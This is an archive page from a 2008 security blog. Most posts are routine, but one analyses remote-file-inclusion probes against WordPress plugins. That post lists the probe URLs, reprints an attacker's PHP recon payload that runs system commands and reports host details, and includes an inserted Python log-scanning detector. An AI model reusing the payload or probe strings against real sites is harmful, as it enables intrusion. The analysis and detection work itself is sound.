Firefox 3.0, crashes and bandwidth overload

June 17th, 2008

Some two and a half hours into the FF3.0 download campaign, and the toll is beginning to show. spreadfirefox.com seems to be refusing connections. While individual mirror sites seem up, it looks like the counts are going via some redirector script. getfirefox.com is, however, working fine.

The impact it's having on mirrors seems to be quite intense. The following two images show traffic stats from mirror.ac.za, the mirror service run by TENET here in South Africa.

Total bandwidth from mirror.ac.za nodes

Update:

A Firefox 3.0 download counter is now available: 943806 so far, currently averaging some 7000/minute. There is some commentary on the outages, although they seem to have cleared.

Download Day - English

FireFox 3.0 Launch day & record Attempt

June 17th, 2008

Today is the official launch of the Firefox 3.0 browser. The 24-hour period from June 17th to June 18th will be a record attempt to get into the Guinness Book of Records for the most software downloads in a day. The day apparently starts on Tuesday, June 17th after 10am PDT.

This aside, I think the upgrade is well worth it, and I've been more than happy since Beta2, when I moved my primary system over to running 3.0. The biggest improvements are rendering when switching between tabs (and I usually have LOTS of tabs) and memory usage.


Tomorrow regular programming resumes ;)

VizSec 2007 proceedings out

June 16th, 2008

The Proceedings of the 2007 Workshop on Visualization for Computer Security (VizSec 2007) are finally available. Springer has the book available for order at a princely 60 Euros. Amazon has the book listed but not yet available for shipping, but one can pre-order. For those interested, Springer has a flyer and table of contents available. PDF versions of the presentations given are available from the VizSec 2007 website.

My copy should hopefully be arriving in the next few weeks, and I'm looking forward to the work done by John R Goodall, Gregory Conti and Kwan-Liu Ma as editors. I'm just sorry I'm not going to make VizSec 2008 this year.

The two papers that I presented are (links to the PDF slides):

DAVIX live CD looking for Beta Testers

June 15th, 2008

DAVIX is the upcoming live CD for data analysis and visualization, which will be released at Blackhat/DEFCON in Las Vegas this summer, with another talk at VizSec 2008. From the VizSec.org announcement:

Jan Monsch and Raffael Marty and I have prepared the second beta version of DAVIX, and are now seeking beta testers that have the time to test DAVIX and answer the questionnaire that comes along with the beta version. All completely filled out questionnaires received by me until Monday 23 June 2008 18:00 UTC will enter a raffle for one autographed copy of Raffy's upcoming book "Applied Security Visualization".

If you want to participate in the beta test please contact: jan.monsch ät iplosion.com

What makes me quite happy is that they have included InetVis as one of their four chosen visual analysis tools on the live CD.

I've been playing with this since this morning and so far so good.

Visualizing Viruses

June 12th, 2008

Wired has an article on the artwork done by MIT Media Lab grad student Alex Dragulescu. Working under contract to MessageLabs, he has produced a number of pictures showing images of Mydoom, Ghost Keylogger and other bits of malware.
While all quite pretty, the original post gives no detail of how they were created, although the MalWarez link on his homepage describes the process as follows:

..For each piece of disassembled code, API calls, memory addresses and subroutines are tracked and analyzed. Their frequency, density and grouping are mapped to the inputs of an algorithm that grows a virtual 3D entity.

The Storm Worm is probably my favorite of the visualizations. He also has an interesting set of images entitled SpamPlants, based on input relating to the ASCII character frequency of spam messages.

Now this sounds like a great project for an aspiring security researcher with a graphical bent.

RSS feeds have moved

June 10th, 2008

Further to my previous post about using mod_rewrite to direct my old feed URLs to the right place, it's probably time to notify people who read them in aggregators that the URI has changed, since the aggregators (particularly the web-based ones) hide the redirect, even though it's a 301. To the:

  • 1 subscriber using Google FeedFetcher to grab /blog/index.php?flav=rss
  • 6 subscribers using Google FeedFetcher to grab /blog/?flav=rss&category=Security
  • 27 subscribers using Google FeedFetcher to grab /blog/?flav=rss
  • 2 subscribers using Rojo to fetch /blog/?flav=rss
  • 7 subscribers using NewsGatorOnline to grab /blog/?flav=rss
  • 1 subscriber using Feedshow to grab /blog/?flav=rss

    First of all, thank you for your interest, but the links have changed. My full feed is available as RSS 2.0 or Atom 1.0, or a reduced Security-only feed as RSS 2.0 (but you miss out on the fun stuff).

    This is why this post is actually tagged as security, so they get it too ;)

    Another RFC to BibTeX script

    June 9th, 2008

    Following on from my earlier post regarding a pre-compiled BibTeX database of all Internet RFCs, I discovered while browsing the CTAN archives that Richard Mortier wrote an awk script back in 2000, while at Cambridge Computing Lab, that does something similar. For purists who don't trust this newfangled XML and XSLT stuff, it's available at:

    http://www.ctan.org/tex-archive/biblio/bibtex/utils/misc/rfc2bib.awk

    or at other CTAN mirrors closer to you.

    Happy 30th 8086 Father of the x86 architecture

    June 8th, 2008

    Thirty years ago today (8 June 1978), Intel unleashed the 8086 16-bit CPU on the world, some four years after the debut of the 8080 which powered the Altair computer (something I wish I could find to own!).
    Computerworld has a really nice writeup on the history and development over the last 30 years, and a corresponding brief timeline.

    Intel’s own Microprocessor Hall of Fame describes the chip as:

    A pivotal sale to IBM’s new personal computer division made the 8088 the brains of IBM’s new hit product–the IBM PC. The 8088’s success propelled Intel into the ranks of the Fortune 500, and Fortune magazine named the company one of the “Business Triumphs of the Seventies.”

    Intel also has a nice image (300K) of the 8086 and 8088 die.

    While purists will probably grumble about the horridness of the x86 family instruction set in comparison to some RISC and embedded controller instruction sets, it has proved highly scalable and extensible over the last 30 years.

    Wordpress and dealing with incoming hacks

    June 7th, 2008

    The other morning started out with a conversation with darb that went as follows:

    DARB: so…wordpress hey?
    BVI: I got over writing my own code
    BVI: now I’m waiting for my blog to be 0wn3d
    DARB: you know wordpress is the equivalent of an 8ft tall ogre that stands outside looking pretty, smashes tables when he tries to sit down, and needs 20kg of food every day…and offers little or no protection on the side entrance to your establishment?
    BVI: exactly!
    DARB: lolz
    BVI: mine has a spiked collar and a beware of the ogre sign :-)
    DARB: that only scares away legitimate users…bandits read that sign as “come on in, we left the side door open”
    BVI: yeah
    DARB: I love wordpress docs and plugins
    DARB: “just chown your /tmp file, and then chmod 777 everything”

    Well, not 20 minutes later I noticed a number of remote file inclusion attacks coming in. Nothing like the ogre having sent out an invite to all and sundry. The attacks looked as follows:

    • /blog/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
    • /blog/archives/5/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
    • /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
    • /blog/archives/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
    • /blog/?flav=rss/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
    • /wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
    • /blog/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
    • /blog/archives/14/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
    • /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
    • /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo

    In the above, the actual path to the exploit code has been replaced with foo; it is of the form http://site/somepath/tx.txt????, or similar.

    I've now seen this from over eighty different systems. The include file varies (see below), but the same plugins are being targeted. No real surprise, as they have been known to be exploitable for a while.

    All the requests were made using libwww-perl/5.810, so they most likely come from compromised Unix systems. The payload file being referred to has been removed, but I found some others, which are no doubt similar. The algorithm being used for the brute forcing is rather dumb: of the entries listed above, only two relate to viable targets for my given install. I found the request for "blog/?flav=rss/…." rather amusing. Another interesting observation is the number of requests centered around http://lair.moria.org/blog/archives/14, my post relating to Windows XP failing to hibernate. I have yet to see hits on any other particular post.
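    The indicators in the requests above (a plugin include parameter such as wpPATH or myPath carrying an absolute URL, the trailing run of question marks, and the libwww-perl user agent) are easy to pull out of an Apache access log. The following script is an added example, not code from the original post: it parses combined-format log lines and flags the ones that match those indicators. The sample log lines are constructed for the example, with an example.invalid hostname standing in for the payload host.

```python
"""Flag remote-file-inclusion probes in an Apache combined-format access log.

Added example for this post (not the blog's own code). Indicators are taken
from the requests described above; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Include parameters seen being abused in the post; compared case-insensitively.
INCLUDE_PARAMS = {"wppath", "mypath"}
# A parameter value that is itself an absolute URL is the RFI signature.
URL_PREFIX = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample log: two probes matching the post's pattern, two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jun/2008:08:12:01 +0200] "GET /blog/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://example.invalid/tx.txt??? HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
203.0.113.7 - - [07/Jun/2008:08:12:02 +0200] "GET /blog/archives/14/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://example.invalid/tx.txt????? HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
198.51.100.9 - - [07/Jun/2008:08:15:44 +0200] "GET /blog/?flav=rss HTTP/1.0" 301 249 "-" "Feedfetcher-Google"
192.0.2.33 - - [07/Jun/2008:08:16:10 +0200] "GET /blog/archives/14 HTTP/1.1" 200 18234 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return the list of indicator names for one log line (empty list = nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    target = m.group("target")
    query = urlsplit(target).query
    indicators = []
    # keep_blank_values so a bare "?????" tail does not make the parse drop the pair
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in INCLUDE_PARAMS and URL_PREFIX.match(value):
            indicators.append("rfi:" + key)
    if re.search(r"\?{2,}$", target):
        indicators.append("trailing-qmarks")
    if m.group("agent").lower().startswith("libwww-perl"):
        indicators.append("ua:libwww-perl")
    return indicators


def scan(log_text):
    """Return (ip, target, indicators) for every line carrying at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        indicators = classify(line)
        if indicators:
            m = LOG_RE.match(line)
            ip = m.group("ip") if m else "-"
            target = m.group("target") if m else line
            hits.append((ip, target, indicators))
    return hits


if __name__ == "__main__":
    for ip, target, indicators in scan(SAMPLE_LOG):
        print(ip, ",".join(indicators), target)
```

    Run against a real log, the "rfi:" indicator is the one worth alerting on; the user agent and the trailing question marks are weaker signals on their own, but they are useful for grouping the probes by source.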

    Looking at the payload code from some of the other similar attacks, I found the following one interesting, as a more human-driven recon script providing information for making a value judgment on the target site, rather than an automated assault. (When will these people learn that StudlyCaps isn't really that cool?)

    echo "BraT<br>";
    $alb = @php_uname();
    $alb2 = system(uptime);
    $alb3 = system(id);
    $alb4 = @getcwd();
    $alb5 = getenv("SERVER_SOFTWARE");
    $alb6 = phpversion();
    $alb7 = $_SERVER['SERVER_NAME'];
    $alb8 = gethostbyname($SERVER_ADDR);
    $alb9 = get_current_user();
    $os = @PHP_OS;
    echo "os: $os<br>";
    echo "uname -a: $alb<br>";
    echo "uptime: $alb2<br>";
    echo "id: $alb3<br>";
    echo "pwd: $alb4<br>";
    echo "user: $alb9<br>";
    echo "phpv: $alb6<br>";
    echo "SoftWare: $alb5<br>";
    echo "ServerName: $alb7<br>";
    echo "ServerAddr: $alb8<br>";
    echo "NigeriaN HackerS TeaM<br>";

    Others are not quite so benign, providing command shells and, in some cases, drive-by exploits using a number of different tools to try to download further payloads onto the system, or to upload password files, web server configurations and other sensitive information. c99madscript.php really seems to be the flavour of the month with these, although it has been around a while.

    What all the attempts I've seen have in common is the trailing "???" or "?????", irrespective of the payload contents or filename. The purpose of these is unclear to me; surely it's a pain to type. Is it a bug in a script, or are people trying to do something else?

    Migrating URLs with apache and mod_rewrite

    June 6th, 2008

    Having now migrated to Wordpress from my own very customised version of phpBloxsom, which ran the previous incarnation of this blog, I've been left with the issue of dealing with all the sites pulling my RSS feeds. With the change of software has come a change of URL for the location of the feeds.

    Apache’s mod_rewrite seems to be the obvious candidate for making this as transparent as possible. In essence what needed to happen was incoming requests for:

    "GET /blog/?flav=rss&category=Security HTTP/1.0" and
    "GET /blog/?flav=rss HTTP/1.0" need to be converted into:

    http://lair.moria.org/blog/archives/category/security/feed

    and

    http://lair.moria.org/blog/feed respectively.

    This was achieved by matching on the QUERY_STRING variable within Apache. The real trick came in trying to get the new URLs to appear clean. This proved to be more difficult than I expected. My initial rewrite rules resulted in the following:

    "GET /blog/?flav=rss HTTP/1.0" 301 249 "
    "GET /blog/feed/?flav=rss HTTP/1.0" 200 54274 ""

    The agent was directed to the right URL, but it still looks ugly. Note the use of an HTTP 301 status code, indicating permanently moved, rather than the 302 which mod_redirect usually provides. The solution to the query string being appended turned out to be to force my own null query string onto the redirect. The Apache Wiki was where I finally found the right answer: the way to remove a QUERY_STRING is to append a blank query string, i.e. a bare "?", to the redirect target.

    The final setup in my .htaccess for Wordpress looks as follows:

    
    RewriteCond %{QUERY_STRING} ^flav=rss$ [NC]
    RewriteRule ^$ http://lair.moria.org/blog/feed? [R=301,L]
    RewriteCond %{QUERY_STRING} ^flav=rss&(category)=Security$ [NC]
    RewriteRule ^$ http://lair.moria.org/blog/archives/category/security/feed? [R=301,L]
    RewriteCond %{QUERY_STRING} ^flav=atom$ [NC]
    RewriteRule ^$ http://lair.moria.org/blog/feed/atom? [R=301,L]
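
    To check that the three rules send each legacy feed URL where it should go, and to see why the first attempt leaked the query string, the following script is an added example (not part of the original post, and not Apache itself). It is a small emulation of the two mod_rewrite behaviours the post relies on: RewriteCond is matched against the raw QUERY_STRING, RewriteRule against the path relative to the .htaccess directory (the empty string for a request to /blog/), and a substitution with no "?" gets the original query string re-appended while a trailing "?" discards it. The "first attempt" rules are an assumption: the same three rules with the trailing "?" removed, which is the only difference the post describes. Other flags and later rules are not modelled.

```python
"""Offline check of the feed-redirect rules in the .htaccess above.

Added example for this post, not the blog's own code. It emulates only the
mod_rewrite behaviour the post depends on; see the lead-in for assumptions.
"""
import re

# (RewriteCond pattern on QUERY_STRING, RewriteRule pattern on the path, substitution)
# copied from the final .htaccess in the post; all three use [NC] and [R=301,L].
FINAL_RULES = [
    (r"^flav=rss$", r"^$", "http://lair.moria.org/blog/feed?"),
    (r"^flav=rss&(category)=Security$", r"^$",
     "http://lair.moria.org/blog/archives/category/security/feed?"),
    (r"^flav=atom$", r"^$", "http://lair.moria.org/blog/feed/atom?"),
]

# Assumed reconstruction of the first attempt: identical rules without the trailing '?'.
FIRST_ATTEMPT = [(cond, rule, subst[:-1]) for cond, rule, subst in FINAL_RULES]


def redirect_location(path, query, rules=FINAL_RULES):
    """Return the Location the first matching [R=301,L] rule would send, or None."""
    for cond, rule, subst in rules:
        if not re.search(cond, query, re.IGNORECASE):   # [NC] on the RewriteCond
            continue
        if not re.search(rule, path):                   # RewriteRule pattern on the path
            continue
        if subst.endswith("?"):
            return subst[:-1]             # trailing '?' -> original query string discarded
        if query:
            return subst + "?" + query    # no '?' in substitution -> query string re-appended
        return subst
    return None


def check_all(rules=FINAL_RULES):
    """Map each legacy feed query string (requested at /blog/) to its Location."""
    legacy = [("", "flav=rss"), ("", "flav=rss&category=Security"), ("", "flav=atom")]
    return {query: redirect_location(path, query, rules) for path, query in legacy}


if __name__ == "__main__":
    for label, rules in (("first attempt", FIRST_ATTEMPT), ("final", FINAL_RULES)):
        print(label)
        for query, location in check_all(rules).items():
            print(f"  /blog/?{query} -> {location}")
```

    Requests for other paths under /blog/ (an archive page with ?flav=rss appended, say) match none of the rules, since RewriteRule ^$ only matches the directory itself, and fall through to Wordpress untouched.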